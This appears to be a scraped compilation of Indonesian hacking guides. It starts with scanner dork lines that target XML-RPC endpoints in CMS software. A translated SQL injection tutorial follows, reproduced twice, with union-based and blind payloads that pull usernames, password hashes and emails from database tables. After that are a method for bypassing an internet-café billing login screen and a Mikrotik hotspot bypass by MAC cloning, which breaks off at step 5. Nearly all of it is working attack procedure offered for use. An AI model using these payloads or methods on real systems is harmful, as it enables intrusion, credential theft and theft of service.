!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml /faq/xmlrpc.php "/index.php?p=faq"
!xml /faq/xmlrpc.php "/index.php?pg=faq"
!xml /faq/xmlrpc.php "/index.php?pag=faq"
!xml /faq/xmlrpc.php "/index.php?page=faq"
!xml /faq/xmlrpc.php "/?faq"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
Simple SQL Hacking by Marezzi
Simple SQL Hacking
ada beberapa kata dari terjemahan ini yang agak berbeda untuk memudahkan newbie seperti saya ini untuk memahami.
di ambil dari
http://milw0rm.com/papers/202
================= begin of paper ====================
SQL Injection Tutorial by Marezzi (MySQL)
Dalam tutorial ini saya akan menggambarkan bagaimana sql injection bekerja dan bagaimana teknik ini bisa memberikan seseorang informasi yang sangat berguna.
Pertama : apa itu SQL Injection??
Bug ini merupakan Bug yang paling umum yang ada pada applikasi web sampai sekarang. Celah keamanan ini mengizinkan attacker untuk mengeksekusi database melalui Url dan mendapatkan access untuk memperoleh informasi penting dan lain-lain.
1. SQL Injection (memanfaatkan error yang terlihat)
2. Blind SQL Injection (Agak Sulit)
1. SQL Injection (memanfaatkan error yang terlihat/classic SQL Injection)
-= Pengecekan apakah site bisa di Attack apa tidak dengan teknik sql injection.
misal kita memiliki target seperti ini:
Code:
http://www.site.com/news.php?id=5
kita coba site berlubang atau tidak dengan menambah tanda ' (petik satu) di akhir url dan hasilnya akan menjadi seperti
Code:
http://www.site.com/news.php?id=5'
jika kita melihat error seperti "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right bla..bla.." atau error yang sejenis, itu berarti site bisa kita Attack menggunakan SQL injection.
-= tahap kedua menebak jumlah kolom
untuk menemukan banyak kolom kita menggunakan command ORDER BY. Bagaimana menggunakan perintah ini? kita hanya menambah angkat setelah By sampai kita mendapatkan error. misal
Code:
http://www.site.com/news.php?id=5 order by 1/* <-- ga ada error http://www.site.com/news.php?id=5 order by 2/* <-- ga ada error http://www.site.com/news.php?id=5 order by 3/* <-- ga ada error http://www.site.com/news.php?id=5 order by 4/* <-- ternyata error klo misal nampak errornya maka akan ada tulisan "Unknwon column '4' in 'order clause' " atau yang mirip seperti itu. itu berarti database memiliki 3 kolom karena sewaktu kita mencoba menebak kolom ke 4 ternyata hasilnya error itu tandanya kolom ke 4 tidak ada. -= Mencari data selanjutnya dengan menggunakan UNION (perintah mengabungkan) Dengan UNION kita menggabungkan perintah yang lainnya dalam satu perintah (seringnya perintah SELECT. Misal Code: http://www.site.com/news.php?id=5 union select 1,2,3/* (kenapa ada 1,2,3 itu karena kita sebelumnya sudah mendapatkan ada 3 kolom hasil dari perintah ORDER BY kalau misal ada 4 kolom ya jadi 1,2,3,4) jika kita melihat salah satu angka dari tiga angka tadi maka itu tandannya perintah UNION bekerja. -= Lanjut tahap selanjutnya pengecekan versi mysql misal: Code: http://www.site.com/news.php?id=5 union all select 1,2,3/* nb: jika ini tidak bekerja coba ganti '/*' menggunakan '--' (cari di google arti tanda-tanda itu). Misal di layar muncul angka 2, maka kita ganti angka dua itu dengan perintah @@version atau version() jika tidak error maka akan muncul versi dari mysql seperti 4.1.33-log or 5.0.45 atau semacam nya. kalau mendapatkan error seperti "union + illegal mix of collations (IMPLICIT + COERCIBLE) ... bla bla bla" berarti kita membutuhkan fungsi convert() misal Code: http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* atau bisa juga dengan menggunakan hex() dan unhex() misal Code: http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* maka akan tampil versi dari mysql nya.. ^^ -= tahap selanjutnya dapatkan nama table sama nama kolomnya Jika kita mendapatkan versi mysql dibawah versi 5 (4.1.33, 4.1.12..). berarti kita harus menebak sendiri nama tabel sama kolomnya. umumnya nama table seperti ini:user,users,admin,admins,member,members dll... lalu untuk nama kolom umumnya seperti ini:username,user,usr,user_name,password,pass,passwd,pwd,dll.. misal kita tebak seperti ini untuk nama tablenya. Code: http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (kita lihat angka 2 muncul di layar seperti sebelumnya) berarti tabel dengan nama admin memang ada. sekarang kita tinggal tebak nama kolomnya. misal Code: http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* jika mendapat error atau layar kosong maka coba tebak dengan nama lain. jika berhasil maka di layar akan tampak username,contohnya admin atau superadmin atau lain"... sekarang coba tebak kolom passwordnya misalkan Code: http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* kalau error coba nama lain. kalau berhasil maka akan ada password yang tampil di layar baik itu dalam bentuk hash(terenkripsi) atau plain-text(tidak di enkripsi) tergantung dari settingan mysqlnya. contohnya: md5 hash, mysql hash, sha1, dll.. sekarang kita harus merubah query biar terlihat lebih enak di pandang. untuk itu kita membutuhkan fungsi concat() untuk menggabungkan kedua string (username dan password) contoh : Code: http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* lihat di contoh itu ada 0x3a, 0x3a dalam hexadesimal memiliki arti tanda titik dua ':'. ada juga dengan cara char(58) *angka 58 dalam ASCII* misal Code: http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* maka kita akan mendapatkan hasil di layar seperti ini username : password contoh nya 'admin:admin' atau 'admin:somehash'. kita bisa login menggunakan username dan password tersebut untuk mendapatkan akses dalam aplikasi web tersebut. jika tidak dapat menebak nama tabel name dengan benar, kamu coba gunakan mysql.user(default) contoh Code: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/* -= MySQL 5 jika kita mendapatkan versi 5 maka kita membutuhkan information_schema untuk mendapatkan nama tabel dan nama kolom. informtion_schema ini menyimpan semua informasi table dan kolomnya. untuk mendapatkan tabelnya kita gunakan table_name dan information_schema.tables. contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/* disini kita coba mengganti angka 2 dengan table_name untuk mendapatkan tabel pertama dari information_schema.tables yang akan di tampilkan dilayar. sekarang kita butuh menambah LIMIT di akhir query untuk menampilkan satu persatu semua database.contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/* disini saya menggunakan 0,1 (dapatkan 1 output dimulai dari yang paling awal '0th'). untuk melihat tabel kedua kita ganti limit 0,1 jadi limit 1,1 contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/* maka akan muncul di layar table kedua dari database. tuk yang ketiga kita ganti lagi menjadi limit 2,1 contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/* trus di tambah satu-satu sampe dapatkan tabel yang di mau.contohnya db_admin,poll_user, auth, auth_user dll.. untuk mendapatkan nama kolom menggunakan metode yang sama. tapi bedanya untuk kolom kita menggunakan colomn_name dan information_schema.colomns. Metode yang digunakan sama seperti diatas contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/* kolom pertama akan tampil. dan untuk yang kedua (kita ganti limit 0,1 menjadi limit 1,1) contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/* maka akan tampil kolom yang kedua, lakukan terus penambahan pada limit tadi hingga kita dapatkan kolom yang kita mau seperti username,user,login,password,pass,passwd,dll.. :D jika kamu ingin menampilkan nama kolom pada tabel tertentu bisa gunakan query ini. misal kita sudah menemukan table dengan nama 'users' (tanpa tanda petik) contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/* maka kita akan mendapatkan nama kolom pertama pada table users. Gunakan LIMIT untuk menampilkan satu persatu semua nama kolom dalam tabel user. (query tidak bisa dikarenakan jika magic quotes dalam keadaan ON). misal kita sudah menemukan kolom user,pass,dan email. untuk menyelesaikannya kita bisa tampilkan secara bersamaan dengan menggunakan fungsi concat(), contoh Code: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* maka kita akan mendapatkan user : pass : email from table users. contoh: admin:hash:whatever@blabla.com.. finish untuk bagian pertama, sekarang kita masuk ke bagian kedua yang agak sulit :) 2 Blind SQL Injection Blind SQL Injection sedikit lebih rumit dari pada classic injection tapi ini dapat terselesaikan. banyak sekali tutorial sql injection yang sangat bagus dari xprog, itu tidak buruk untuk coba membacanya.kita masuk ke tutorial. misal kita memiliki target Code: http://www.site.com/news.php?id=5 . ketika kita mengaksesnya maka akan artikel-artikel di halaman tersebut,gambar atau yang lainnya.. kita coba untuk test site ini dengan serangan blind sql injection. Code: http://www.site.com/news.php?id=5 and 1=1 <-- ini akan selalu menghasilkan nilai TRUE. dan halaman akan menampilkan artikel secara normal. sekarang coba test seperti Code: http://www.site.com/news.php?id=5 and 1=2 <-- ini akan menghasilkan nilai FALSE jika beberapa text, gambar atau beberpa isi hilang maka site tersebut vulrnable untuk blind sql injecjtion. -= dapatkan versi MySQL untuk mendapatkan versi MySQL kita gunakan substring.. contoh Code: http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 maka ini akan mengembalikan nilai TRUE jika versi mysql adalah 4. ganti 4 dengan 5, dan jika query mengembalikan nilai true saat telah diganti dengan 5 maka versi mysql adalah 5 contoh Code: http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 -= test jika subselect berkerja ketika SELECT tidak bisa berkerja maka kita gunakan subselect contoh Code: http://www.site.com/news.php?id=5 and (select 1)=1 jika halaman tampil secara normal itu berarti subselect berkerja.kita dapat melihat bahwa kita bisa akses ke mysql.users contoh Code: http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 jika halaman ditampilkan normal maka kita punya akses ke mysql.user dan seletah itu kita bisa mengeluarkan beberapa password menggunakan fungsi load_file() dan OUTFILE -= cek nama table dan nama kolom bagian ini adalah bagian dimana tebak menebak menjadi teman baik contoh Code: http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (dengan limit 0,1 query kita disini mengembalikan 1 baris dari data, karena subselect hanya mengembalikan 1 baris, ini sangat penting) lalu jika halaman ini berjalan normal tanpa ada bagian dari isi yang hilang, maka table dengan nama user ada. jika kamu mendapatkan FALSE(ada bagian artikel yang hilang), rubah saja nama table sampai kamu menebak dengan benar. katakan saja kita sudah menemukan bahwa tablenya bernama users, sekarang yang kita butuhkan adalah nama kolom. sama seperti tabel name. kita mulai menebak. seperti yang saya bilang sebelumnya coba menebak dengan nama-nama yang umum untuk kolom. contoh Code: http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 jika halaman tampil normal maka kita tahu bahwa nama kolomnya adalah password (jika salah maka coba dengan nama umum atau coba menebak saja) disini kita menggabungkan angka satu dengan nama kolom password lalu substring akan mengembalikan karakter pertama (,1,1) -= Mengambil data dari database kita temukan table users dengan kolom username dan password selanjutnya kita akan mengambil karakter-karakter dari sana. Code: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ini adalah pengambilan karakter pertama dari user pertama dalam table users. substring disini akan mengembalikan karakter pertama dan panjangnya 1 karakter. ascii() mengconvert 1 karakter itu ke dalam nilai ASCII dan membandinnya dengan menggunakan simbol lebih besar. jadi jika karakter ascii lebih besar dari 80,maka halaman akan menampilkan artikel secara normal. ini berarti bernilai TRUE maka lakukan hingga mendapat nilai FALSE. contoh
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
kita masih mendapat nilai TRUE, tetap naikan terus.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE lagi,tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
jadi karakter pertama dalam username adalah char(99). menggunakan converter ascii kita tau bahwa char(99) ada lah huruf 'c'.
sekarang kita cek karakter ke dua.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note kita saya ganti ,1,1 menjadi ,2,1 untuk mendapatkan karakter ke 2. (sekarang dia akan mengembalikan karakter ke dua dan 1 karakter panjangnya)
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE,halaman masih normal.tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, kurangi angkanya.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
sekarang kita tahu bahwa karakter ke dua adalah char(105) dan itu adalah 'i'. kita punya 'ci' jadi untuk lebih jauhnya lagi maka tetaplah menambah sampai akhir.(ketika >0 nilai nya FALSE maka kita tau kita sudah di akhir). ada banyak tool untuk Blind SQL Injection, saya pikir sqlmap yang terbaik, tapi saya melakukan dengan manual. karena itu akan menjadikan mu lebih lihai dalam SQL INJECTION.
Saya harap kamu bisa mempelajari sesuatu dari tutorial ini
Selamat bersenang senang.
ada beberapa kata dari terjemahan ini yang agak berbeda untuk memudahkan newbie seperti saya ini untuk memahami.
di ambil dari
http://milw0rm.com/papers/202
================= begin of paper ====================
SQL Injection Tutorial by Marezzi (MySQL)
Dalam tutorial ini saya akan menggambarkan bagaimana sql injection bekerja dan bagaimana teknik ini bisa memberikan seseorang informasi yang sangat berguna.
Pertama : apa itu SQL Injection??
Bug ini merupakan Bug yang paling umum yang ada pada applikasi web sampai sekarang. Celah keamanan ini mengizinkan attacker untuk mengeksekusi database melalui Url dan mendapatkan access untuk memperoleh informasi penting dan lain-lain.
1. SQL Injection (memanfaatkan error yang terlihat)
2. Blind SQL Injection (Agak Sulit)
1. SQL Injection (memanfaatkan error yang terlihat/classic SQL Injection)
-= Pengecekan apakah site bisa di Attack apa tidak dengan teknik sql injection.
misal kita memiliki target seperti ini:
Code:
http://www.site.com/news.php?id=5
kita coba site berlubang atau tidak dengan menambah tanda ' (petik satu) di akhir url dan hasilnya akan menjadi seperti
Code:
http://www.site.com/news.php?id=5'
jika kita melihat error seperti "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right bla..bla.." atau error yang sejenis, itu berarti site bisa kita Attack menggunakan SQL injection.
-= tahap kedua menebak jumlah kolom
untuk menemukan banyak kolom kita menggunakan command ORDER BY. Bagaimana menggunakan perintah ini? kita hanya menambah angkat setelah By sampai kita mendapatkan error. misal
Code:
http://www.site.com/news.php?id=5 order by 1/* <-- ga ada error http://www.site.com/news.php?id=5 order by 2/* <-- ga ada error http://www.site.com/news.php?id=5 order by 3/* <-- ga ada error http://www.site.com/news.php?id=5 order by 4/* <-- ternyata error klo misal nampak errornya maka akan ada tulisan "Unknwon column '4' in 'order clause' " atau yang mirip seperti itu. itu berarti database memiliki 3 kolom karena sewaktu kita mencoba menebak kolom ke 4 ternyata hasilnya error itu tandanya kolom ke 4 tidak ada. -= Mencari data selanjutnya dengan menggunakan UNION (perintah mengabungkan) Dengan UNION kita menggabungkan perintah yang lainnya dalam satu perintah (seringnya perintah SELECT. Misal Code: http://www.site.com/news.php?id=5 union select 1,2,3/* (kenapa ada 1,2,3 itu karena kita sebelumnya sudah mendapatkan ada 3 kolom hasil dari perintah ORDER BY kalau misal ada 4 kolom ya jadi 1,2,3,4) jika kita melihat salah satu angka dari tiga angka tadi maka itu tandannya perintah UNION bekerja. -= Lanjut tahap selanjutnya pengecekan versi mysql misal: Code: http://www.site.com/news.php?id=5 union all select 1,2,3/* nb: jika ini tidak bekerja coba ganti '/*' menggunakan '--' (cari di google arti tanda-tanda itu). Misal di layar muncul angka 2, maka kita ganti angka dua itu dengan perintah @@version atau version() jika tidak error maka akan muncul versi dari mysql seperti 4.1.33-log or 5.0.45 atau semacam nya. kalau mendapatkan error seperti "union + illegal mix of collations (IMPLICIT + COERCIBLE) ... bla bla bla" berarti kita membutuhkan fungsi convert() misal Code: http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* atau bisa juga dengan menggunakan hex() dan unhex() misal Code: http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* maka akan tampil versi dari mysql nya.. ^^ -= tahap selanjutnya dapatkan nama table sama nama kolomnya Jika kita mendapatkan versi mysql dibawah versi 5 (4.1.33, 4.1.12..). berarti kita harus menebak sendiri nama tabel sama kolomnya. umumnya nama table seperti ini:user,users,admin,admins,member,members dll... lalu untuk nama kolom umumnya seperti ini:username,user,usr,user_name,password,pass,passwd,pwd,dll.. misal kita tebak seperti ini untuk nama tablenya. Code: http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (kita lihat angka 2 muncul di layar seperti sebelumnya) berarti tabel dengan nama admin memang ada. sekarang kita tinggal tebak nama kolomnya. misal Code: http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* jika mendapat error atau layar kosong maka coba tebak dengan nama lain. jika berhasil maka di layar akan tampak username,contohnya admin atau superadmin atau lain"... sekarang coba tebak kolom passwordnya misalkan Code: http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* kalau error coba nama lain. kalau berhasil maka akan ada password yang tampil di layar baik itu dalam bentuk hash(terenkripsi) atau plain-text(tidak di enkripsi) tergantung dari settingan mysqlnya. contohnya: md5 hash, mysql hash, sha1, dll.. sekarang kita harus merubah query biar terlihat lebih enak di pandang. untuk itu kita membutuhkan fungsi concat() untuk menggabungkan kedua string (username dan password) contoh : Code: http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* lihat di contoh itu ada 0x3a, 0x3a dalam hexadesimal memiliki arti tanda titik dua ':'. ada juga dengan cara char(58) *angka 58 dalam ASCII* misal Code: http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* maka kita akan mendapatkan hasil di layar seperti ini username : password contoh nya 'admin:admin' atau 'admin:somehash'. kita bisa login menggunakan username dan password tersebut untuk mendapatkan akses dalam aplikasi web tersebut. jika tidak dapat menebak nama tabel name dengan benar, kamu coba gunakan mysql.user(default) contoh Code: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/* -= MySQL 5 jika kita mendapatkan versi 5 maka kita membutuhkan information_schema untuk mendapatkan nama tabel dan nama kolom. informtion_schema ini menyimpan semua informasi table dan kolomnya. untuk mendapatkan tabelnya kita gunakan table_name dan information_schema.tables. contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/* disini kita coba mengganti angka 2 dengan table_name untuk mendapatkan tabel pertama dari information_schema.tables yang akan di tampilkan dilayar. sekarang kita butuh menambah LIMIT di akhir query untuk menampilkan satu persatu semua database.contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/* disini saya menggunakan 0,1 (dapatkan 1 output dimulai dari yang paling awal '0th'). untuk melihat tabel kedua kita ganti limit 0,1 jadi limit 1,1 contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/* maka akan muncul di layar table kedua dari database. tuk yang ketiga kita ganti lagi menjadi limit 2,1 contoh Code: http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/* trus di tambah satu-satu sampe dapatkan tabel yang di mau.contohnya db_admin,poll_user, auth, auth_user dll.. untuk mendapatkan nama kolom menggunakan metode yang sama. tapi bedanya untuk kolom kita menggunakan colomn_name dan information_schema.colomns. Metode yang digunakan sama seperti diatas contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/* kolom pertama akan tampil. dan untuk yang kedua (kita ganti limit 0,1 menjadi limit 1,1) contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/* maka akan tampil kolom yang kedua, lakukan terus penambahan pada limit tadi hingga kita dapatkan kolom yang kita mau seperti username,user,login,password,pass,passwd,dll.. :D jika kamu ingin menampilkan nama kolom pada tabel tertentu bisa gunakan query ini. misal kita sudah menemukan table dengan nama 'users' (tanpa tanda petik) contoh Code: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/* maka kita akan mendapatkan nama kolom pertama pada table users. Gunakan LIMIT untuk menampilkan satu persatu semua nama kolom dalam tabel user. (query tidak bisa dikarenakan jika magic quotes dalam keadaan ON). misal kita sudah menemukan kolom user,pass,dan email. untuk menyelesaikannya kita bisa tampilkan secara bersamaan dengan menggunakan fungsi concat(), contoh Code: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* maka kita akan mendapatkan user : pass : email from table users. contoh: admin:hash:whatever@blabla.com.. finish untuk bagian pertama, sekarang kita masuk ke bagian kedua yang agak sulit :) 2 Blind SQL Injection Blind SQL Injection sedikit lebih rumit dari pada classic injection tapi ini dapat terselesaikan. banyak sekali tutorial sql injection yang sangat bagus dari xprog, itu tidak buruk untuk coba membacanya.kita masuk ke tutorial. misal kita memiliki target Code: http://www.site.com/news.php?id=5 . ketika kita mengaksesnya maka akan artikel-artikel di halaman tersebut,gambar atau yang lainnya.. kita coba untuk test site ini dengan serangan blind sql injection. Code: http://www.site.com/news.php?id=5 and 1=1 <-- ini akan selalu menghasilkan nilai TRUE. dan halaman akan menampilkan artikel secara normal. sekarang coba test seperti Code: http://www.site.com/news.php?id=5 and 1=2 <-- ini akan menghasilkan nilai FALSE jika beberapa text, gambar atau beberpa isi hilang maka site tersebut vulrnable untuk blind sql injecjtion. -= dapatkan versi MySQL untuk mendapatkan versi MySQL kita gunakan substring.. contoh Code: http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 maka ini akan mengembalikan nilai TRUE jika versi mysql adalah 4. ganti 4 dengan 5, dan jika query mengembalikan nilai true saat telah diganti dengan 5 maka versi mysql adalah 5 contoh Code: http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 -= test jika subselect berkerja ketika SELECT tidak bisa berkerja maka kita gunakan subselect contoh Code: http://www.site.com/news.php?id=5 and (select 1)=1 jika halaman tampil secara normal itu berarti subselect berkerja.kita dapat melihat bahwa kita bisa akses ke mysql.users contoh Code: http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 jika halaman ditampilkan normal maka kita punya akses ke mysql.user dan seletah itu kita bisa mengeluarkan beberapa password menggunakan fungsi load_file() dan OUTFILE -= cek nama table dan nama kolom bagian ini adalah bagian dimana tebak menebak menjadi teman baik contoh Code: http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (dengan limit 0,1 query kita disini mengembalikan 1 baris dari data, karena subselect hanya mengembalikan 1 baris, ini sangat penting) lalu jika halaman ini berjalan normal tanpa ada bagian dari isi yang hilang, maka table dengan nama user ada. jika kamu mendapatkan FALSE(ada bagian artikel yang hilang), rubah saja nama table sampai kamu menebak dengan benar. katakan saja kita sudah menemukan bahwa tablenya bernama users, sekarang yang kita butuhkan adalah nama kolom. sama seperti tabel name. kita mulai menebak. seperti yang saya bilang sebelumnya coba menebak dengan nama-nama yang umum untuk kolom. contoh Code: http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 jika halaman tampil normal maka kita tahu bahwa nama kolomnya adalah password (jika salah maka coba dengan nama umum atau coba menebak saja) disini kita menggabungkan angka satu dengan nama kolom password lalu substring akan mengembalikan karakter pertama (,1,1) -= Mengambil data dari database kita temukan table users dengan kolom username dan password selanjutnya kita akan mengambil karakter-karakter dari sana. Code: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ini adalah pengambilan karakter pertama dari user pertama dalam table users. substring disini akan mengembalikan karakter pertama dan panjangnya 1 karakter. ascii() mengconvert 1 karakter itu ke dalam nilai ASCII dan membandinnya dengan menggunakan simbol lebih besar. jadi jika karakter ascii lebih besar dari 80,maka halaman akan menampilkan artikel secara normal. ini berarti bernilai TRUE maka lakukan hingga mendapat nilai FALSE. contoh
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
kita masih mendapat nilai TRUE, tetap naikan terus.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE lagi,tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
jadi karakter pertama dalam username adalah char(99). menggunakan converter ascii kita tau bahwa char(99) ada lah huruf 'c'.
sekarang kita cek karakter ke dua.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note kita saya ganti ,1,1 menjadi ,2,1 untuk mendapatkan karakter ke 2. (sekarang dia akan mengembalikan karakter ke dua dan 1 karakter panjangnya)
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE,halaman masih normal.tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, kurangi angkanya.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, tambah lagi.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
sekarang kita tahu bahwa karakter ke dua adalah char(105) dan itu adalah 'i'. kita punya 'ci' jadi untuk lebih jauhnya lagi maka tetaplah menambah sampai akhir.(ketika >0 nilai nya FALSE maka kita tau kita sudah di akhir). ada banyak tool untuk Blind SQL Injection, saya pikir sqlmap yang terbaik, tapi saya melakukan dengan manual. karena itu akan menjadikan mu lebih lihai dalam SQL INJECTION.
Saya harap kamu bisa mempelajari sesuatu dari tutorial ini
Selamat bersenang senang.
Cracking Caesarsoft Billing
Sebelumnya saya ijin maaf ato apalah yg laen klo udah repost… Cuma pingin berbagi tips n trik cara membobol billing warnet khususnya CAESARSOFT*
Sebenernya caranya cukup simple. kita log in id n pass username menggunakan administrator. tapi perlu digaris bawah klo cara ini “masih” ada kemungkinan ketauan. klo OPnya teliti cz waktu kita uda log in pake pass admin. di billing client ga kelacak alias ga ada user yg maket itu komp…jadi waspadalah !! ^^
Okelah tanpa panjang pendek. gini caranya :
1. Pastiin kita telah masuk login screennya Cyber Billing
2. Tekan key : Windows + U, trus kita masuk Utility Manager
3. Pilih menu Help
4.Klo sdh masuk help pagenya, Klik kanan di windows bar
5. Pilih Jump to URL..
6. Ketik ke C: buat masuk ke systemnya… trus modif aja sesuai keinginan (bisa jg lgsg masuk buat internetan gratis. Tapi cm pake IE aja..)
Selamat berkreasi. artikel ini saya tulis hanya untuk berbagi ilmu aja. Dari rasa penasaran yg akhirnya jadi ugal-ugalan… Tapi sesuai pepatah “ga ada yang aman didunia ini”….
Sebenernya caranya cukup simple. kita log in id n pass username menggunakan administrator. tapi perlu digaris bawah klo cara ini “masih” ada kemungkinan ketauan. klo OPnya teliti cz waktu kita uda log in pake pass admin. di billing client ga kelacak alias ga ada user yg maket itu komp…jadi waspadalah !! ^^
Okelah tanpa panjang pendek. gini caranya :
1. Pastiin kita telah masuk login screennya Cyber Billing
2. Tekan key : Windows + U, trus kita masuk Utility Manager
3. Pilih menu Help
4.Klo sdh masuk help pagenya, Klik kanan di windows bar
5. Pilih Jump to URL..
6. Ketik ke C: buat masuk ke systemnya… trus modif aja sesuai keinginan (bisa jg lgsg masuk buat internetan gratis. Tapi cm pake IE aja..)
Selamat berkreasi. artikel ini saya tulis hanya untuk berbagi ilmu aja. Dari rasa penasaran yg akhirnya jadi ugal-ugalan… Tapi sesuai pepatah “ga ada yang aman didunia ini”….
Basic Mikrotik Hotspot Hacking
Satu lagi cara berinternet gratis yaitu dengan meng-hack hotspot mikrotik. Sebenarnya cara ini sudah basi, tetapi karena baru saja saya mempraktekan maka saya tulis langkah-langkahnya. Disamping untuk mengingat kalau lupa kan bisa untuk sharing buat yang lain, yang mungkin belum tahu atau masih kurang paham. Biasanya kalau kita terhubung dengan hotspot mikrotik maka kita akan dihadapkan dengan menu mikrotik login sebelum kita bisa browsing.
Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.
Berikut langkah-langkahnya :
1. Download dulu program Netcut, program ini untuk mengetahui MAC address yang terhubung dengan kita. Netcut bisa didownload disini.
2. Koneksikan komputer kita dengan hotspot mikrotik
3. Jalankan program Netcut
4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard
5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi yang akan kita jadikan target (dalam contoh ini yang menjadi target adalah network dengan IP 192.168.182.18). Yang jelas bukan network kita atau network server.
